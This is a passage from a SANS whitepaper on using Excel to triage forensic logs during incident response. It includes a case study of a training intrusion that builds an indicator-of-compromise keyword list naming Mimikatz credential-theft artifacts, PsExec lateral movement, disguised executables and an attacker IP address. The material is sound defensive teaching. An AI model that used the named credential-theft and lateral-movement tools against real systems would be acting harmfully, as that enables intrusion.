times tamps  that occur outside of the incident time line. These timestamps  can happen  
when the artifact is showing the file compile time  instead of its execution time . Another 
example would  be time-stomping,  which is an anti -forensics technique to change the 
MFT timestamps of a file . 
Any new entries found that are related to the intrusion  should  be ‘Named’ and 
‘Filled .’ You should then copy off the highlighted rows onto a separate workbook which 
will contain all the rows of interest from all the logs collected.  
3.5. Macros  
Many of the tasks described above are tedious and repetitive. In such 
circumstances, it is easier to automate the tasks using VBA macros. You’ll be provide d 
with several VBA macros so you do not need to perform the task manually.  To use 
macros, open the exported  log file in E xcel and then save it as an Excel macro -enabled  
workbook file with a n XLSM file extension.  Open the newly created  .XLSM file to 
import the  macro into the spreadsheet. Once the spreadsheet is o pen, you need to launch  
the VBA Editor window by hitting the Alt -F11 keys. With the VBA window  open , select 
the ‘File’ dropdown menu and click on ‘Import File .’ Browse to the .B AS file with the 
code you are looking to run  and select ‘Open .’ Close the VBA window and head back to 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
2 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	the spreadsheet. Under the ‘Developer’ tab, select the ‘Macros’ button, highlight the 
newly imported  macro in the popup window and select ‘Run’ (See Figur e 10).   
 
Figure	 10.	Run	Macro.	(Lee,	2014,	digital	case	files) 	
There are several macros in the GitHub repository that can automate the processes 
described above. See Appendix C for a list of macro s available in the repository and a 
description of what each one accomplishes.  
3.6. Pivot Tables  
Pivot Tables are an excellent  way to sort data in a way that visually allow s you to 
pick out artifacts of interest . “A pivot table allows you to create an interactiv e view of 
your dataset. With a pivot table report, you can quickly and easily categorize your data 
into meaningful information, and perform a wide variety of calculations in a fraction of 
the time it takes by hand ” (Jelen, 2006, p. 9) . This categorization of data is particularly  
true when working with Windows Event Viewer log s. Exporting the data in XML table 
format provides  headers that can be used to categorize the data in ways t hat will allow 
you to  see trends and commonalities.  The GitHub  site has a document named  
“Pivot_Table_Example .docx ” that  shows examples of how you can work with pivot 
tables  to analyze data  (https://github.com/gregory -
lalla/ GCIH_Gold/blob/master /Docs/Supplement/  Pivot_Table_Example .docx ). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
3 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	4. Gathering the Data  
Having  explained the essentials of organizing logs with Excel, real understanding  
comes from  seeing the techniques demonstrated on specific types of log files.  This 
section will discuss examples of different log files that an incident responder may have to 
examine w hile investigating a compromised network. Then in the following section, a 
case study will be analyzed employing the techniques described in this paper. Appendix 
D provides a detailed explanation on how the  Windows log files  in the case study were 
formatte d. A supplement document  on the GitHub site  named  
‘Additional_Log_Formatting_Instructions.docx ’ (https://github.com/gregory -
lalla/GCIH_Gold/blob/master/Docs/Supplement/Additional_Log_Formatting_Instruction
s.docx ) provides a detailed explanation of the remaining log files mentioned in this 
section . 
4.1. Windows Logs  
4.1.1.  Event Viewer Logs  
One of the primary  sources of information/data gathered from a Windows 
operating system  will come from Event Viewer logs, especially if re commended auditing 
settings  are configured appropriately  (see https://technet.microsoft.com/en -
us/library/ee513968%28WS.10%29.aspx  for recommendations).  Unfortunately, a 
“Microsoft Windows event log is a binary file that consists of special records – Wind ows 
events” (“Windows event log essentials”, 2017) and parsing the data is not as simple as 
manipulating the file in a text editor . Also,  when exporting the data from the native 
Windows Event Viewer tool, depending on the format chosen, different data is r eturned. 
Last, if you’ve ever tried to filter or search using the native Windows Event Viewer tool, 
you know that it has many limitations and is extremely slow.  
Because Event Viewer logs can contain hundreds of thousands of en tries, it is 
essential to reduce the data to a manageable level. Since the  Event Viewer GUI  is 
extremely slow , the native Windows command line utility named  WEVTUTIL.EXE 
should be used to export the data. This tool comes with its challenges such as producing 
XML  files that Excel canno t open . When running the command, there are several options 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
4 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	to massage the data to a format that Excel accepts . To get the correct results, you may 
need to mix and match the switches until you get a compatible output .  
4.1.2.  ShimCache Entries  
The ShimCache or Ap plication Compatibility Cache entries show executables that 
were likely run  on the system . “The Windows Shimcache was created by Microsoft 
beginning in Windows XP to track compatibility issues with executed programs...It is 
important to understand there may be entries in the Shimcache that were not actually 
executed” (Parisi, 2015).  “Microsoft designed the Shimcache in Windows Vista, 7, 
Server 2008 and Server 2012 to incorporate a ‘Process Execution Flag’ category for each 
entry” (Parisi, 2015). For further details on the Shimcache and the differences between 
XP/2003 and Vista+, see https://www.fireeye.com/blog/threat -
research/2015/06/caching_out_the_val.html  
4.1.3.  Shellbags  
Shellbags reflect the locations that the user has traversed using Windows 
Explorer. “Shellb ags are found in the Windows Registry and store user preferences for 
folder display in Windows Explorer, such as the size of the window or how items were 
listed. For a folder to exist in the shellbags, it must have been opened in Windows 
Explorer at least one time by the user” (Cowen, 2013, ch. 13). The user’s usrclass.dat 
(Vista+) and NTUSER.DAT registry files contain the Shellbag artifacts .  
4.1.4.  AutoRun Entries  
Autorun entries refer to “software that runs automatically without being 
intentionally started by the user. These include drivers and services that start when the 
computer boots; application, utilities and shell extensions that start when a user logs on; 
and browser extensions that load when Internet Explorer is started” (Russinovich, 2011, 
ch. 5) . To parse  autorun  data,  run the autorunsc.exe command against the registry files of 
a system. You can run the tool  on a live system or offline by mounting an imag e of the 
hard drive  and pointing the program  to the newly mapped location.  
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
5 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	4.1.5.  Web Browser Logs  
The client browser may provide clues on how the adversary initially got onto a 
system, either through the user browsing the internet or by clicking on a link in an email 
or document. That information may be quite valuable in targeted attacks against the 
employees of a company. This section will examine Internet Explorer (IE) history/cache 
logs in index.dat files (IE 9 and below). Newer versions of IE browsers store t heir data in 
an Extensible Storage Engine (ESE) database. There are still other browsers that use 
SQLite database s. However, the data represented  should still be similar once exported out 
of the database and into a plaintext format.  
4.1.6.  MFT Entries  
“The Master File Table (MFT) is the heart of NTFS because it contains the 
information about all files and directories. Every file and directory has at least one entry 
in the table, and the entries by themselves are very simple” (Carrier, 2005, p. 274).  
4.1.7.  Prefetch Entries  
“Application prefetch is intended to enable a better user experience within 
Windows systems by monitoring an application as it’s launched, and then ‘prefetching’ 
the necessary code to a single location so that the next time the application i s launched, it 
launches faster. This way, the system doesn’t have to seek across the file system for 
DLLs and other data that it needs to start the application – it knows where to  find it” 
(Carvey, 2014, p. 98).  
4.2. Other Log File Types  
4.2.1.  Linux System Logs  
The formatting of logs produced by many applications and services  in Linux 
make importing the data into  Excel challenging . The  manual massagin g of the data is not 
difficult but must be done in several stages using a variety of tools. Many of the tools 
originate d on the UNIX operating system, but the ones used in this document have all 
been ported over to Windows. These tools are from the GNU utilities run under the Open 
Source tools  package CYGWIN . 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
6 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	Linux produces several plain text system logs that may have value to the incident 
response analyst and which all have the same log format. In the supplement , we will look 
specifically at the Syslog, Auth.log and Cron.log files, but we can use the same 
techniques against the Daemon.log, Boo t.log, Mail.log and other system log files . See 
http://www.thegeekstuff.com/2011/08/linux -var-log-files/ for a listing of system logs that 
may appear on a Linux host.  
The syslog daemon handles messages from the entire system to include many of 
the system l ogs mentioned above. Depending on the configuration of the logging in the 
syslog.conf configuration file, the bulk of the message usu ally are sent to the  ‘syslog’ 
(often named  ‘messages’ ) log file. The Auth.log file contains user authentication 
information , and the Cron logs record the activity of the cron jobs (sche duled tasks) run 
on the system.  
4.2.2.  Apache Access and Error Logs  
Another log you may find on a Linux server  is the Apache www -access.log file 
which records connections made from a client to the web services of the system. Web 
servers are often exploited and could provide  the adversary with an initial stepping stone 
into a network. What gets logged can vary based on the confi guration of the web server.  
The Apache Error logs contain web server error a nd resour ce alerts. The 
formatting of this log is  similar ly to the Linux system logs discussed previously . The lo g 
should  have the dates and delimiters correct ed, so each field is in its proper column.  
4.2.3.  IIS Web and FTP Logs  
The native format of the IIS Web log allows for easy importing of data into Excel. 
However, the scattering of headers throughout a log file presents the only real issue.  By 
filtering on the Date/Time column for entries that are not in the Date/Time format,  the 
extra headings can be found and removed.  
4.2.4.  IPTables  Firewall Logs  
Scrutinizing  network traffic when combined with other types of artifacts may also 
be beneficial to your investigation by identifying communications associated with the 
event and adding th ose IP addresses to your keywords for further examination . 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
7 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	IPTables and most other firewalls will produce logs that can be exported and 
examined. IPTables is run on Unix/Linux systems and has logs similar in format to the 
Linux system logs discussed earlie r in this paper. Therefore, the same steps are used to 
fix the dates and set the delineation of the fields . 
4.2.5.  Packet Captures  
Packet Captures can be included as well into the anal ysis of the incident. F or the 
packets to get formatted correctly when exported,  the columns in Wireshark need to be 
changed to produce the results desired.  
4.2.6.  Snort  and Bro IDS Logs  
Host -based and network -based IDS  logs are critical to incorporate into the 
analysis as it may be the primary reason you are aware of the intrusion  in the fi rst place. 
These logs  usually contain data from the best vantage point, either from the network or 
host perspective . 
Snort is an open source product that “supports sending real -time alerts when an 
intrusion event is detected and can even be used as an inli ne ‘intrusion prevention 
system’ that enables you to receive alerts in real time and in several different medium, 
rather than having to continuously sit at a desk monitoring your Snort system 24 hours  a 
day” (Caswell, 2007, ch. 2).  
The supplement will look at the logs produced by running snort in Fast alert mode  
which “w rites the alert in a simple format with a timestamp, alert message, source and 
destination IPs/ports ” (Roesch, 2003) . 
Bro is another open source intrusion detection system. “Bro inspects all traffic 
flowing into and out of a network. It can operate in passive mode, in which it generates 
alerts for suspicious activity, or in active mode, in which it injects traffic to disrupt 
malicious activity  ... Unlike other NIDSs, Bro monitors tr affic flows rather than just 
matching patterns inside individual packets. This method of operation means that Bro can 
detect suspicious activity based on who talks to whom, even without matching any 
particular string or pattern” (Nemeth, 2010, ch. 22). Bro  produces several logs, each of 
which can use the technique described in the supplement  to achieve our standard layout. 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
8 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	Here are s ome of the logs Bro generates: Conn, DHCP, DNS, Files, HTTP, Weird, etc. 
The supplement  will examine the Bro Connect log (conn .log) which records TCP, UDP 
and ICMP connections .  
5. Case Study  
5.1. SANS Stark Research Labs  
The techniques for extracting and importing the relevant log files in this Case 
Study  are shown in Appendix D. M acros to automate the manipulation of the data are 
listed in Appendix C .  The application of  these tools and techniques  will be demonstrated 
by examining an incident  presented in the SANS Forensic  508 Advanced Computer 
Forensic Analysis and Incident Response exercise workbook titled ‘Stark Research Labs 
Intrusi on.’ The scenario describes  how a company received a phone call on April 06, 
2012 @ 5  PM EDT from a 3 -4 letter government agency stating “We have seen a few 
hundred megabytes of sensitive data leave your network bound for a foreign country. 
Don’t ask how w e know, but you might want to check 10.3.58.7 on your network” (Lee, 
2014, ex. 0 p. 2 ). 
Given other information about the company and its assets, a preliminary keyword 
list is compiled by the incident response team to include the following terms: hydra, star 
fury, agent s, secret and formula . When  discussing log files and artifacts below, you can 
assume  that the files have already been imported into Excel with the standard format .  
5.1.1.  WinXP -TDugan (WKS -WINXP32BIT)  
The host reported as leaking data ( IP address  of 10.3.58.7 ) is a machine running 
Windows XP. Since data appears to be actively leaving the host, the first step would be to 
see what applications have been running on the system . There are two artifacts made 
available to us that can show what was runnin g on the workstation . The  first is the 
Prefetch files . Applying our initial keyword list against the output gives us one hit on 
HYDRAKATZ.EXE . The name of the file is similar to Mimikatz, which is a post 
exploitation tool to capture user credentials. We wi ll flag this suspicious executable by 
giving the hit a ‘Named Cell ’ of ‘HYDRAKATZ  _1’ and highlighting the row  in yellow 
(Figure 11). 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
9 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 11.	Named	Cell	and	Highlight	keyword	hits.	(Lee,	2014,	digital	case	files) 	
This keyword hit also gives us an initial timeframe of the incident. The file 
Hydrakatz ran on 04/03/2012 , and a notification was sent to the  company regarding a 
data leak on 04/06/2012. Looking at the Prefetch entries around that timeframe gives us 
addition clues. Right around hydrakatz.exe, t here is a file that appears to be a randomly 
generated name, PKXEZY1TJI98.EXE ; two files with unusual names, HYVY.EXE and 
A.EXE; and the execution of FTP.EXE . These are all  ‘Named’ and highlighted  (Figure 
12). 
 
Figure	 12.	Unusual	File	Names.	(Lee,	2014,	digital	case	files) 	
Looking within  the timeframe, we see  activities that suggest the  adversary ran 
commands on the system (Figure 13).  There is also another  suspicious file name d 
PE.EXE. These are all ‘Named ’ and highlighted  as well  (Figure 13). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
0 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 13.	Suspicious	activity.	(Lee,	2014,	digital	case	files) 	
The keyword lists should contain the newly found k eywords identified in the  
Prefetch output . As new ones get found, those will be added as well to help locate other 
indicators of compromise. The second artifact containing the execution of files  is the 
ShimCache  entries from the registry .  
Running the keywords against the ShimCache artifacts produced one hit on file 
PE.EXE.  Though the dates  of the artifact  don’t show the time of execution , executables 
with the same write timestamp may be related. In this output , there is another executable, 
located in a strange location, which  has the same timesta mp as PE.EXE. Normally 
svchost.exe will reside in C:\Windows \System32. Its location in  
C:\Windows \System32 \dllhost, mak es it suspicious. Since the legitimate svchost.exe file 
shows up in a lot of logs, the keyword for this IOC will be ‘ \dllhost \’. Both ent ries are 
‘Named’ and highlighted (Figure 14). 
 
Figure	 14.	Identical	Timestamps.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
1 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	Next , we’ll look at the MFT file. After running our keywords against this  file’s 
output , we can now see the full paths of the suspicious artifacts (Figure 15). 
 
Figure	 15.	Paths	of	suspicious	files 	are	displayed .	(Lee,	2014,	digital	case	files) 	
When looking at the keyword hits, you’ll notice that they often appear i n clusters. 
Looking at one of the clusters, we see a new artifact named SEKURLSA.DLL  in the 
middle of several suspicious executables (Figure 16). Googling this file name shows us 
that it belongs to the Mimikatz tool mentioned previously. This discovery sub stantiates 
our guess that file hydrkatz.exe is Mimikatz in disguise. Therefore, we’ll add Sekurlsa.dll 
to our keyword list.  
 
Figure	 16.	Mimikatz	 .dll	file.	(Lee,	2014,	digital	case	files) 	
Finally, it is easy to filter the data on a particular  path to see if there are any other 
files of interest in the same directories. Looking at c: \windows \system32 \dllhost \, we find 
the file  WINCLIENT.REG , which we’ll add to the keyword list  (Figure 17). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
2 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 17.	Winclient	artifact.	(Lee,	2014,	digital	case	files) 	
Using the keywords or IOCs discovered  so far, we can start to look for  other 
compromised systems on the network.  
5.1.2.  Win7 -32-NROMANOFF  (WKS -WIN732BITA)  
Running our keyword  list against workstation WKS -WIN732BITA (10.3.58.7) 
prefetch files generates hits on A.EXE and HYDRAKATX.EXE. Within the  intrusion 
timeframe  established earlier , we see the adversary possibly using  native Windows tools 
to explore the host and network  (Figure 18). 
 
Figure	 18.	Possible	n ative	 Windows	 tools	used	by	 the	adversary.	(Lee,	2014,	digital	case	files) 	
Executing one after the other are two suspicious files with randomly generated 
names (Figure 19).  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
3 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 19.	Randomly	generated	file	names.	(Lee,	2014,	digital	case	files) 	
Finally, there  is a well -known artifact associated with the remote administrative 
command tool named PSEXEC by Microsoft. Administrators of the system  could have 
used this tool to manage the system , but since it appears in our timeframe and may be an 
indication of  lateral movement of the adversary, the keyword  PSEXE  will be added to 
our list  to spot the ‘Client’ executable of PSEXEC.EXE and the ‘Service’ executable o f 
PSEXESRV.EXE . Right below PSEXESRV.E XE is another artifact observed  on 
workstation WKS -WINXP32BIT (but not noted), named SPINLOCK.EXE. Since this 
executable was run two minutes after PSEXEC and since the name of the file is not 
familiar  to us , it will be  added to the keyword list as well (Figure 20). 
 
Figure	 20.	The	keyword	list	has	two	more	files	added	to	it .	(Lee,	2014,	digital	case	files) 	
Keywords run against the Autoruns output gives us two hits. One on 
PSEXESRV.EXE and one for C:\Windows \System32 \dllhost \svchost.exe (Figure 21).   
 
Figure	 21.	Two	keyword	hits	on	Autorun	entries.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
4 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	We find two additional hits when examining the Shellbag  entries of user  
Vibranium  (Figure 22 ). 
 
Figure	 22.	Shellbag	keyword	hits.	(Lee,	2014,	digital	case	files) 	
Running the keywords against the ShimCache entries yields several interesting 
artifacts. First, we see that C:\Windows \Temp\a.exe is executed 47 time s in one hour. 
Next , we find an entry with a file name from our keyword list, but with a different file 
extension . Recall that we saw a suspicious file called WINCLIENT.REG. The keyword 
list contained  only the word WINCLIENT as the search term. This shortened keyword 
produced a hit on WINCLIENT.EXE which we found  in user V ibranium ’s download 
folder  (Figure 23). This user account is the same one seen above accessing the 
C:\Windows \System32 \dllhost \ directory which contained the WINCLIENT.REG file  
from before .  
 
Figure	 23.	Winclient	keyword	hit.	(Lee,	2014,	digital	case	files) 	
Last, every entry from 04/03/2012 onward is a hit, except three files. Looking at 
these three files, they appear  suspicious and are flagged (Figure 24). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
5 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 24.	Suspicious	Entries 	found 	in	the	Time	Frame.	(Lee,	2014,	digital	case	files) 	
Running the keywords against the MFT file shows  us the paths of the artifacts of 
interest on this system (Figure 25). 
 
Figure	 25.	File	paths	for	keyword	hits.	(Lee,	2014,	digital	case	files) 	
Running the keywords against the Application Event Viewer log  produced two 
hits (Figure 26). 
 
Figure	 26.	The	keyword	hits	in	the	 Application	Event	Viewer	 log.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
6 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	The Security Event Viewer log  has several keywords  in it (Figure 27). 
 
Figure	 27.	The	keyword	hits	in	the	 Security 	Event	Viewer	log .	(Lee,	2014,	digital	case	files) 	
And fi nally, the System Even t Viewer log  has a bunch of hits (Figure 28). 
 
Figure	 28.	The	keyword	hits	in	the	 System 	Event	Viewer	log .	(Lee,	2014,	digital	case	files) 	
Examining the Event Viewer l ogs using Event IDs instead of k eywords, also 
yields some information  that was not previously known. Pivoting on Event ID 5156 
(“The Windows Filtering Plat form has permitted a connection ”) shows an outbound 
connection from one of the suspicious executables to IP address 12.190.135.235 (Figure 
29). This address will be added to the keyword list and possibly added to the company’s 
network devices to log or block any connections still going to this location . 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
7 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 29.	Outbound	connection.	(Lee,	2014,	digital	case	files) 	
Examining the Event IDs in the CSV output of the Event Viewer Security log 
shows us some other activity that could be related to the intrusion. First, we filter on 
Event ID 4624 ( “An account was successfully logged on ”) Type 10 
(“RemoteInteractive ”), which shows us poss ible lateral movement using the Remote 
Desktop protocol (Figure 30). 
 
Figure	 30.	Possible	lateral	movement.	(Lee,	2014,	digital	case	files) 	
Next, we apply a filter  on Event ID s 4717, 4724, 4732, 4733, and 4738. These 
Event IDs relate to changes made to user accounts. The results of the filter show  activity 
by account RSYDOW against account SRL -Helpdesk (Figure 31). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
8 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 31.	User	account	changes.	(Lee ,	2014,	digital	case	files) 	
Finally, examining the System Event Viewer log  by Event ID  produces several 
more keywords. The Event ID filtered on is 7045 ( “A service was installed in the 
system ”). This filter shows us hits on several  suspicious executables  that we’ve  already 
seen, but also provides us with  unique Service Names of Mys, winsvchost, and 
MqlXmtLRaYQDMsvljY  (Figure 32). We added t hese three new terms to the keyword 
list. 
 
Figure	 32.	The	keyword	list	has	 Service	names	added	to	 it.	(Lee,	2014,	digital	case	files) 	
5.1.3.  Win7 -64-NFURRY  (WKS -WIN764BITB)  
Running our keyword list against workstation WKS -WIN764BITB (10.3.58. 6) 
Autorun entries shows us Scheduled Tasks that run two of the suspicious executables that 
we h ave seen on other machines on this network (Figure 33). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2
9 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 33.	Suspicious	scheduled	tasks.	(Lee,	2014,	digital	case	files) 	
A search against NFurry’s  Shellbag entries shows the directory 
C:\Windows \System32 \dllhost \ where seve ral suspicious executables reside (Figure 34). 
 
Figure	 34.	Shellbag	keyword	hits.	(Lee,	2014,	digital	case	files) 	
A keyword search against the MFT entries on the system shows the suspicious 
WINCLIENT.REG file in a user’s Recycle B in (Figure 35). 
 
Figure	 35.	Winclient	in	user’s	recycle	bin.	(Lee,	2014,	digital	case	files) 	
When we look  at the Application Event Viewer log , two entries show up for the 
suspicious SVCHOST.EXE file (Figure 36). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
0 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 36.	Keyword	hits	in	the	 Application	Event	Viewer	log.	(Lee,	2014,	digital	case	files) 	
And finally for this host, in the System Event Viewer log , several instances of 
PSEXEC and PSEXESVC are found running as services (Figure 37). 
 
Figure	 37.	Keyword	hits	in	the	 System 	Event	Viewer	log .	(Lee,	2014,	digital	case	files) 	
5.1.4.  Win2008R2 -Controller  (CONTROLLER)  
The last host (IP Address 10.3.58.4 ) examined in this case study  is the domain 
controller. When we look at  the Autorun entries, we discover  a scheduled task to run 
SPINLOCK.EXE (Figure 38). 
 
Figure	 38.	Suspicious	scheduled	task.	(Lee,	2014,	digital	case	files) 	
Examining  the MFT log  show s PSEXEC and Spinlock on the system (Figure 39). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
1 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 39.	Keyword	hits	in	MFT	file.	(Lee,	2014,	digital	case	files) 	
The Application Event Viewer records the same SPINLOCK.EXE file in 
Windows Error Reporting (WER)  (Figure 40). 
 
Figure	 40.	Keyword	hits	i n	the	 Application	Event	Viewer	log.	(Lee,	2014,	digital	case	files) 	
The Security Event  Viewer log  (Figure 41) and the System Event Viewer log  
(Figure 42), both show  the PSEXESVC.EXE service running.  
 
Figure	 41.	Keyword	hits	in	the	 Security 	Event	Viewer	log.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
2 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 42.	Keyword	hits	in	the	 System 	Event	Viewer	log.	(Lee,	2014,	digital	case	files) 	
5.1.5.  Master IOC Spreadsheet  
Taking all the hits found from each of the workstations and combining them into 
one master spreadsheet allows the responder to  see, among other benefits , what the 
adversary  is doing chronologically;  what artifacts they used across systems;  and what 
capabil ities they deployed . To demonstrate the techniques outlined in this paper , the 
standard output in the below images have  been manipulated to fit the relevant 
information into the screenshots . 
When we look at the timeline of events , the incident appears to have started on 
04/03/2012 with the exploitation of host TGUNGAN ( WKS -WINXP32BIT ), then 
laterally moving to host NROMANOFF (WKS -WIN732BITA), then on to the Domain 
Controller (CONTROLLER) and finally to NFURY (WKS -WIN764BITB)  (Figu re 43).  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
3 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 43.	A	timeline	of	events.	(Lee,	2014,	digital	case	files) 	
Tools used across hosts by the adversary  include svchost.exe (Figure 44), a.exe 
(Figure 45), spinlock.exe (Figure 46), winclient (Figure 47), and psexesvc (Figure 48). 
 
Figure	 44.	SVCHOST.EXE	keyword	hits.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
4 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 45.	A.EXE	keyword	hits.	(Lee,	2014,	digital	case	files) 	
 
Figure	 46.	SPINLOCK .EXE	 keyword	hits.	(Lee,	2014,	digital	case	files) 	
 
Figure	 47.	WINCLIENT 	keyword	hits.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
5 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 48.	PSEXESVC .EXE	keyword	hits.	(Lee,	2014,	digital	case	files) 	
The capabilities of  the adversary are  also significant  to know to defend  and 
respond  to the intrusion. Figure 48 has already shown that the intruder is likely using 
PSEXEC from Microsoft to assist in moving laterally.  There is also ev idence that the 
adversary is running malw are through Scheduled Tasks (Figure 49) and is using the tool 
Mimiatz tool to steal user credentials (Figure 50). 
 
Figure	 49.	Scheduled	Tasks.	(Lee,	2014,	digital	case	files) 	
 
Figure	 50.	Mimikatz	 artifacts.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
6 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	6. Conclusion  
Using Microsoft Excel in your investigation during an incident can help bring lots 
of different data sources together into one location with a standard format for quick and 
easy analysis of the data. It also allow s the analyst to manipulate the dat a in ways that can 
bring out indica tors of compromise  missed when b uried in unrelated events  contained in 
the original log files. This paper only touched on a few of Microsoft Excel’s features and 
capabilities.  The more you can automate the processes involved in analyzing the data, the 
better th e tool becomes. To take it to a  higher level, consider learning more advanced 
concepts in programming in VBA and taking advantage of add -ins/plugins that Microsoft 
and th ird party entities offer that can expand the analysis of your data even further.  
  
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
7 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	7. References  
References  
	
Carrier, B. (2005). File System Forensic Analysis . Addison -Wesley Professional  
Carvey, H. (2014). Windows Forensic Analysis Toolkit, 4th Edition . Syngress  
Caswell, B., Beale, J., & Baker, A. (2007). Snort Intrusion Detection and Prevention 
Toolkit . Syngress  
Cowen, D. (2013). Computer Forensic InfoSec Pro Guide . McGraw -Hill 
Define and use names in formulas - Excel. (n.d.). Retrieved from 
https://supp ort.office.com/en -us/article/Define -and-use-names -in-formulas -
4d0f13ac -53b7 -422e -afd2-abd7ff379c64  
Jelen, B., & Alexander, M. (2006). Pivot Table Data Crunching . Indianapolis, IN: Que 
Publishing  
Lee, R. (2014). SANS Forensic 508 Advanced Computer Forensic Analysis and Incident 
Response, Stark Research Labs Intrusion: Exercise Workbook . 
